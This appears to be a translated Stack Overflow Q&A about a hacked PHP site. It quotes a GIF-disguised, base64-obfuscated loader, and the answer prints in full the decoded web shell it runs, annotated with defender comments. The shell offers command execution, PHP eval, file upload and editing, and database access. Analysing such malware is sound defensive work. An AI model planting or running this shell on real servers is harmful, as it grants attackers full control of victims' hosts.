php - 如何保护 Linux 服务器免受经过编码的 web shell 攻击

标签 php linux decode

我的网站被这个文件入侵了(下面附上这个 shell 文件的源代码)

GIF89a;
<?php $_F=__FILE__;$_X='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';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));?>

能帮我解码这个文件,
并告诉我如何保护 Linux 服务器免受这类经过编码的 shell 攻击吗?

最佳答案

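这是解码后的脚本。它是一个 PHP web shell:被上传的文件以 GIF89a; 开头,伪装成 GIF 图片,真正的代码通过 eval(base64_decode(...)) 解码后执行。解码只能说明这个文件的功能;由于它允许执行任意命令、读写和上传文件,发现它之后应当把整台服务器视为已被入侵来处理。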

?><?php
// Defender summary of the bootstrap below: it silences PHP errors, defines the
// access password and cookie name, handles login/logout, and lets the `dir`
// query parameter change the working directory used by everything that follows.
error_reporting(0); // Turns OFF all PHP error reporting (the original comment claimed the opposite), so failures leave no visible trace.
$password = ""; // Access secret, or its 32-character md5. It is empty in this sample.
$me = basename('the actual path of this script'); // Placeholder left by the decoding; used as the target of every link and form.
$cookiename = "wieeeee"; // Cookie name used as the session marker; a possible log/traffic indicator for this sample.

if(isset($_POST['pass'])) // A login attempt was submitted.
{
 if(strlen($password) == 32) // A 32-character $password is treated as an md5 digest.
 {
  $_POST['pass'] = md5($_POST['pass']);
 }
 if($_POST['pass'] == $password)
 {
   // The cookie value is the password (or its md5) itself, valid for one hour,
   // so the secret travels in the headers of every later request.
   setcookie($cookiename, $_POST['pass'], time()+3600);
 }
 reload();
}

// NOTE(review): `or` binds looser than `&&`, so this condition reads
// (!empty($password) && !isset(cookie)) or (cookie != $password).
// With the empty $password above and no cookie, both sides are false
// (null != "" is false under loose comparison), so login() is never shown:
// as configured here, anyone who can reach the file's URL can use it, not
// only whoever planted it.
if(!empty($password) && !isset($_COOKIE[$cookiename]) or ($_COOKIE[$cookiename] != $password))
{
 login();
 die();
}
//
// Everything after this point is meant to run only for a logged-in caller.
//
if(isset($_GET['p']) && $_GET['p'] == "logout")
{
setcookie ($cookiename, "", time() - 3600); // Expire the cookie.
reload();
}
if(isset($_GET['dir']))
{
 // `dir` comes straight from the query string; it becomes the base for the
 // relative paths ('.') used by the listing and the page handlers below.
 chdir($_GET['dir']);
}

// Menu entries rendered as links in the page header (key = value of the `p`
// parameter, value = label). The switch further down also handles 'edit',
// 'delete', 'rename' and 'createdir', which are reached from the links and
// forms of the file-listing page rather than from this menu. 'logout' is
// handled earlier, before the header is printed.
$pages = array(
 'cmd' => 'Execute Command',
 'eval' => 'Evaluate PHP',
 'mysql' => 'MySQL Query',
 'chmod' => 'Chmod File',
 'phpinfo' => 'PHPinfo',
 'md5' => 'md5 cracker',
 'headers' => 'Show headers',
 'logout' => 'Log out'
);
//The header, like it?
$header = '<html>
<title>'.getenv("HTTP_HOST").' ~ Shell I</title>
<head>
<style>
td {
 font-size: 12px; 
 font-family: verdana;
 color: #33FF00;
 background: #000000;
}
#d {
 background: #003000;
}
#f {
 background: #003300;
}
#s {
 background: #006300;
}
#d:hover
{
 background: #003300;
}
#f:hover
{
 background: #003000;
}
pre {
 font-size: 10px; 
 font-family: verdana;
 color: #33FF00;
}
a:hover {
text-decoration: none;
}

input,textarea,select {
 border-top-width: 1px; 
 font-weight: bold; 
 border-left-width: 1px; 
 font-size: 10px; 
 border-left-color: #33FF00; 
 background: #000000; 
 border-bottom-width: 1px; 
 border-bottom-color: #33FF00; 
 color: #33FF00; 
 border-top-color: #33FF00; 
 font-family: verdana; 
 border-right-width: 1px; 
 border-right-color: #33FF00;
}
hr {
color: #33FF00;
background-color: #33FF00;
height: 5px;
}
</style>
</head>
<body bgcolor=black alink="#33CC00" vlink="#339900" link="#339900">
<table width=100%><td id="header" width=100%>
<p align=right><b>[<a href="http://www.rootshell-team.info">RootShell</a>]  [<a href="'.$me.'">Home</a>] ';
foreach($pages as $page => $page_name)
{
 $header .= ' [<a href="?p='.$page.'&dir='.realpath('.').'">'.$page_name.'</a>] ';
}
$header .= '<br><hr>'.show_dirs('.').'</td><tr><td>';
print $header;
$footer = '<tr><td><hr><center>&copy; <a href="http://www.ironwarez.info">Iron</a> & <a href="http://www.rootshell-team.info">RootShell Security Group</a></center></td></table></body></head></html>';

//
//Page handling
//
if(isset($_REQUEST['p']))
{
  switch ($_REQUEST['p']) {

   // Defender note: OS command execution. The `command` value is read from
   // $_REQUEST and handed unmodified to whichever function
   // get_execution_method() selected; output is printed inside <pre>.
   // Requests with p=cmd are a direct indicator of use in web-server access
   // logs (the command itself is usually in the POST body, which most
   // servers do not log).
   case 'cmd': //Run command

    print "<form action=\"".$me."?p=cmd&dir=".realpath('.')."\" method=POST><b>Command:</b><input type=text name=command><input type=submit value=\"Execute\"></form>";
     if(isset($_REQUEST['command']))
     {
      print "<pre>";
      execute_command(get_execution_method(),$_REQUEST['command']); // Runs the request-supplied command.
     }
   break;


   // Defender note: arbitrary file write and read. The path comes from the
   // `file` query parameter and the new contents from the `editform` POST
   // field; the file is opened with mode 'w', so existing contents are
   // truncated. Any file writable by the web-server account can be created
   // or replaced this way, so other files on the host may have been altered.
   case 'edit': //Edit a file
    if(isset($_POST['editform']))
    {
     $f = $_GET['file'];
     $fh = fopen($f, 'w') or print "Error while opening file!";
     fwrite($fh, $_POST['editform']) or print "Couldn't save file!";
     fclose($fh);
    }
    print "Editing file <b>".$_GET['file']."</b> (".perm($_GET['file']).")<br><br><form action=\"".$me."?p=edit&file=".$_GET['file']."&dir=".realpath('.')."\" method=POST><textarea cols=90 rows=15 name=\"editform\">";

    // Shows the current contents of the file (HTML-escaped) inside the textarea.
    if(file_exists($_GET['file']))
    {
     $rd = file($_GET['file']);
     foreach($rd as $l)
     {
      print htmlspecialchars($l);
     }
    }

    print "</textarea><input type=submit value=\"Save\"></form>";

   break;

   // Defender note: arbitrary file deletion. unlink() is called on the `file`
   // query parameter once the confirmation form (POST field `yes`) has been
   // submitted; without it, a confirmation form is shown for an existing file.
   case 'delete': //Delete a file

    if(isset($_POST['yes']))
    {
     if(unlink($_GET['file']))
     {
      print "File deleted successfully.";
     }
     else
     {
      print "Couldn't delete file.";
     }
    }


    if(isset($_GET['file']) && file_exists($_GET['file']) && !isset($_POST['yes']))
    {
     print "Are you sure you want to delete ".$_GET['file']."?<br>
     <form action=\"".$me."?p=delete&file=".$_GET['file']."\" method=POST>
     <input type=hidden name=yes value=yes>
     <input type=submit value=\"Delete\">
     ";
    }


   break;


   // Defender note: arbitrary PHP execution. The `eval` POST field is passed
   // to eval() as-is. eval is a language construct rather than a function, so
   // the php.ini disable_functions directive does not block this path even
   // when the OS-command functions are disabled.
   case 'eval': //Evaluate PHP code

    print "<form action=\"".$me."?p=eval\" method=POST>
    <textarea cols=60 rows=10 name=\"eval\">";
    if(isset($_POST['eval']))
    {
     // Echo the submitted code back into the textarea, HTML-escaped.
     print htmlspecialchars($_POST['eval']);
    }
    else
    {
     print "print \"Yo Momma\";";
    }
    print "</textarea><br>
    <input type=submit value=\"Eval\">
    </form>";

    if(isset($_POST['eval']))
    {
     print "<h1>Output:</h1>";
     print "<br>";
     eval($_POST['eval']); // Executes request-supplied PHP in this script's context.
    }

   break;

   // Defender note: permission changes. The path in the `chmod` POST field is
   // set to 0777, 0644 or 0755 according to `chvalue`; any other value changes
   // nothing, although the confirmation line is printed regardless. World-
   // writable (0777) files or directories near the shell are worth checking
   // during clean-up.
   case 'chmod': //Chmod file


    print "<h1>Under construction!</h1>";
    if(isset($_POST['chmod']))
    {
    switch ($_POST['chvalue']){
     case 777:
     chmod($_POST['chmod'],0777);
     break;
     case 644:
     chmod($_POST['chmod'],0644);
     break;
     case 755:
     chmod($_POST['chmod'],0755);
     break;
    }
    print "Changed permissions on ".$_POST['chmod']." to ".$_POST['chvalue'].".";
    }
    // Pre-fill the form with the `file` query parameter, or a placeholder.
    if(isset($_GET['file']))
    {
     $content = urldecode($_GET['file']);
    }
    else
    {
     $content = "file/path/please";
    }

    print "<form action=\"".$me."?p=chmod&file=".$content."&dir=".realpath('.')."\" method=POST><b>File to chmod:
    <input type=text name=chmod value=\"".$content."\" size=70><br><b>New permission:</b>
    <select name=\"chvalue\">
<option value=\"777\">777</option>
<option value=\"644\">644</option>
<option value=\"755\">755</option>
</select><input type=submit value=\"Change\">";

   break;

   // Defender note: database access. Host, user name, password, database and
   // the SQL text all come from POST fields, and the query is run without
   // printing its result. After an incident, treat database credentials
   // stored on this server as exposed and review the database for changes.
   case 'mysql': //MySQL Query

   if(isset($_POST['host']))
   {
    $link = mysql_connect($_POST['host'], $_POST['username'], $_POST['mysqlpass']) or die('Could not connect: ' . mysql_error());
    mysql_select_db($_POST['dbase']);
    $sql = $_POST['query'];


    $result = mysql_query($sql); // Result is stored but never displayed.

   }
   else
   {
    print "
    This only queries the database, doesn't return data!<br>
    <form action=\"".$me."?p=mysql\" method=POST>
    <b>Host:<br></b><input type=text name=host value=\"localhost\" size=10><br>
    <b>Username:<br><input type=text name=username value=\"root\" size=10><br>
    <b>Password:<br></b><input type=password name=mysqlpass value=\"\" size=10><br>
    <b>Database:<br><input type=text name=dbase value=\"test\" size=10><br>

    <b>Query:<br></b<textarea name=query></textarea>
    <input type=submit value=\"Query database\">
    </form>
    ";

   }

   break;

   // Defender note: creates a directory at the path given in the `crdir`
   // query parameter and reports success or failure.
   case 'createdir':
   if(mkdir($_GET['crdir']))
   {
   print 'Directory created successfully.';
   }
   else
   {
   print 'Couldn\'t create directory';
   }
   break;


   // Defender note: information disclosure. phpinfo() prints the complete PHP
   // configuration of the server to the caller.
   case 'phpinfo': //PHP Info
    phpinfo();
   break;


   // Defender note: rename/move. rename() is called with the `fileold` and
   // `filenew` POST fields exactly as submitted. Only the name shown in the
   // form is reduced with basename() and HTML-escaped; the values actually
   // used by rename() are not restricted in any way.
   case 'rename':

    if(isset($_POST['fileold']))
    {
     if(rename($_POST['fileold'],$_POST['filenew']))
     {
      print "File renamed.";
     }
     else
     {
      print "Couldn't rename file.";
     }

    }
    // Display value for the form only.
    if(isset($_GET['file']))
    {
     $file = basename(htmlspecialchars($_GET['file']));
    }
    else
    {
     $file = "";
    }

    print "Renaming ".$file." in folder ".realpath('.').".<br>
        <form action=\"".$me."?p=rename&dir=".realpath('.')."\" method=POST>
     <b>Rename:<br></b><input type=text name=fileold value=\"".$file."\" size=70><br>
     <b>To:<br><input type=text name=filenew value=\"\" size=10><br>
     <input type=submit value=\"Rename file\">
     </form>";
   break;

   // Defender note: a hash-guessing helper that runs on the compromised
   // server's own CPU. It takes a 32-character value from the `md5` POST
   // field, a candidate set from `chars`, and a script time limit from
   // `timelimit` (30 when the submitted value is not numeric). Unexplained
   // CPU-bound PHP requests with p=md5 are the visible symptom.
   case 'md5':
   if(isset($_POST['md5']))
   {
   if(!is_numeric($_POST['timelimit']))
   {
   $_POST['timelimit'] = 30;
   }
   set_time_limit($_POST['timelimit']); // The request controls how long this script may run.
    if(strlen($_POST['md5']) == 32)
    {

      if($_POST['chars'] == "9999")
      {
      $i = 0;
      while($_POST['md5'] != md5($i) && $i != 100000)
       {
        $i++;
       }
      }
      else
      {
       for($i = "a"; $i != "zzzzz"; $i++)
       {
        if(md5($i == $_POST['md5']))
        {
         break;
        }
       }
      }

     if(md5($i) == $_POST['md5'])
     {
       print "<h1>Plaintext of ". $_POST['md5']. " is <i>".$i."</i></h1><br><br>";
     }

    }

   }

   print "Will bruteforce the md5
    <form action=\"".$me."?p=md5\" method=POST>
    <b>md5 to crack:<br></b><input type=text name=md5 value=\"\" size=40><br>
    <b>Characters:</b><br><select name=\"chars\">
    <option value=\"az\">a - zzzzz</option>
    <option value=\"9999\">1 - 9999999</option>
    </select>
    <b>Max. cracking time*:<br></b><input type=text name=timelimit value=\"30\" size=2><br>
    <input type=submit value=\"Bruteforce md5\">
    </form><br>*: if set_time_limit is allowed by php.ini";
   break;

   // Prints every request header returned by getallheaders(), HTML-escaped,
   // one per line.
   case 'headers':
   foreach(getallheaders() as $header => $value)
   {
   print htmlspecialchars($header . ":" . $value)."<br>";

   }
   break;
  }
}
else //Default page that will be shown when the page isn't found or no page is selected.
{

 $files = array();
 $directories = array();

 // Defender note: unrestricted file upload. The uploaded file is stored in
 // the current directory (which the `dir` parameter can change) under the
 // base name supplied by the client; there is no check on type, extension or
 // size beyond PHP's own limits. Files dropped through this form may
 // therefore exist anywhere the web-server account can write.
 if(isset($_FILES['uploadedfile']['name']))
{
 $target_path = realpath('.').'/';
 $target_path = $target_path . basename( $_FILES['uploadedfile']['name']); 
 if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
     print "File:".  basename( $_FILES['uploadedfile']['name']). 
     " has been uploaded";
 } else{
     echo "File upload failed!";
 }
}




 print "<table border=0 width=100%><td width=5% id=s><b>Options</b></td><td id=s><b>Filename</b></td><td id=s><b>Size</b></td><td id=s><b>Permissions</b></td><td id=s>Last modified</td><tr>";
 if ($handle = opendir('.'))
 {
  while (false !== ($file = readdir($handle))) 
  {
        if(is_dir($file))
     {
    $directories[] = $file;
     }
     else
     {
    $files[] = $file;
     }
  }
 asort($directories);
 asort($files);
  foreach($directories as $file)
  {
   print "<td id=d><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=d><a href=\"".$me."?dir=".realpath($file)."\">".$file."</a></td><td id=d></td><td id=d><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=d>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
  }

  foreach($files as $file)
  {
   print "<td id=f><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=f><a href=\"".$me."?p=edit&dir=".realpath('.')."&file=".realpath($file)."\">".$file."</a></td><td id=f>".filesize($file)."</td><td id=f><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=f>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
  }
 }
 else
 {
  print "<u>Error!</u> Can't open <b>".realpath('.')."</b>!<br>";
 }

 print "</table><hr><table border=0 width=100%><td><b>Upload file</b><br><form enctype=\"multipart/form-data\" action=\"".$me."?dir=".realpath('.')."\" method=\"POST\">
<input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000000\" /><input size=30 name=\"uploadedfile\" type=\"file\" />
<input type=\"submit\" value=\"Upload File\" />
</form></td><td><form action=\"".$me."\" method=GET><b>Change Directory<br></b><input type=text size=40 name=dir value=\"".realpath('.')."\"><input type=submit value=\"Change Directory\"></form></td>
<tr><td><form action=\"".$me."\" method=GET><b>Create file<br></b><input type=hidden name=dir value=\"".realpath('.')."\"><input type=text size=40 name=file value=\"".realpath('.')."\"><input type=hidden name=p value=edit><input type=submit value=\"Create file\"></form>
</td><td><form action=\"".$me."\" method=GET><b>Create directory<br></b><input type=text size=40 name=crdir value=\"".realpath('.')."\"><input type=hidden name=dir value=\"".realpath('.')."\"><input type=hidden name=p value=createdir><input type=submit value=\"Create directory\"></form></td>
</table>";

}

/**
 * Prints the password prompt: a single form that POSTs the field `pass`
 * (at most 32 characters) back to this script. It produces no other output
 * and performs no check itself; the comparison is done by the caller.
 */
function login()
{
 print "<table border=0 width=100% height=100%><td valign=\"middle\"><center>
 <form action=".basename('the actual path of this script')." method=\"POST\"><b>Password?</b>
 <input type=\"password\" maxlength=\"32\" name=\"pass\"><input type=\"submit\" value=\"Login\">
 </form>";
}
/**
 * Sends a Location header redirecting the browser back to this script.
 * Execution is not stopped here; the caller's code continues after the call.
 */
function reload()
{
 header("Location: ".basename('the actual path of this script'));
}
/**
 * Probes which OS-command functions exist and returns a label for one of them.
 *
 * Each check overwrites $m, so the last function found wins; "Disabled" is
 * returned when none of the four exists. All four are ordinary PHP functions,
 * so they can be listed in the php.ini disable_functions directive; the
 * shell's separate eval page is not affected by that setting.
 *
 * @return string One of "passthru", "exec", "shell_ exec", "system" or "Disabled".
 */
function get_execution_method()
{
 if(function_exists('passthru')){ $m = "passthru"; }
 if(function_exists('exec')){ $m = "exec"; }
 if(function_exists('shell_exec')){ $m = "shell_ exec"; }
 if(function_exists('system')){ $m = "system"; }
 if(!isset($m)) //No method found :-|
 {
  $m = "Disabled";
 }
 return($m);
}
/**
 * Runs $command through the PHP function named by $method and prints the
 * output. The command string is passed on exactly as received; nothing is
 * escaped or filtered. A $method that matches none of the four branches
 * results in no action.
 *
 * @param string $method  Label as returned by get_execution_method().
 * @param string $command Command line, taken by the caller from the request.
 */
function execute_command($method,$command)
{
 if($method == "passthru")
 {
  passthru($command);
 }

 elseif($method == "exec")
 {
  // exec() collects output lines into $result; each is printed with <br>.
  exec($command,$result);
  foreach($result as $output)
  {
   print $output."<br>";
  }
 }

 elseif($method == "shell_exec")
 {
  print shell_exec($command);
 }

 elseif($method == "system")
 {
  system($command);
 }
}
/**
 * Returns the last four octal digits of a file's mode (for example "0644"),
 * or "????" when the path does not exist.
 *
 * @param string $file Path to inspect.
 * @return string
 */
function perm($file)
{
 if(file_exists($file))
 {
  return substr(sprintf('%o', fileperms($file)), -4);
 }
 else
 {
  return "????";
 }
}
/**
 * Picks the colour used for a file's permission link in the listing, based on
 * what the current process can do with it: "green" when writable, "white"
 * when only readable, "red" when neither.
 *
 * @param string $file Path to inspect.
 * @return string
 */
function get_color($file)
{
if(is_writable($file)) { return "green";}
if(!is_writable($file) && is_readable($file)) { return "white";}
if(!is_writable($file) && !is_readable($file)) { return "red";}

}
/**
 * Builds the breadcrumb shown in the page header: the resolved path of $where
 * split into components, each rendered as a link that sets the `dir`
 * parameter to the path up to and including that component.
 *
 * @param string $where Directory whose real path is displayed.
 * @return string HTML fragment wrapped in <h2>.
 */
function show_dirs($where)
{
 // Paths whose resolved form starts with "c:" are split on backslashes,
 // everything else on forward slashes.
 if(ereg("^c:",realpath($where)))
 {
 $dirparts = explode('\\',realpath($where));
 }
 else
 {
 $dirparts = explode('/',realpath($where));
 }



 $i = 0;
 $total = "";

 foreach($dirparts as $part)
 {
  // Rebuild the prefix made of all components before the current one.
  $p = 0;
  $pre = "";
  while($p != $i)
  {
   $pre .= $dirparts[$p]."/";
   $p++;

  }
  $total .= "<a href=\"".basename('the actual path of this script')."?dir=".$pre.$part."\">".$part."</a>/";
  $i++;
 }

 return "<h2>".$total."</h2><br>";
}
print $footer;
// Stops execution here, so that when this code has been inserted into or
// included from another PHP file, the host file's own code never runs
// after the shell page has been printed.
exit();
?>

关于php - 如何保护服务器 linux 免受编码 shell,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/11735549/
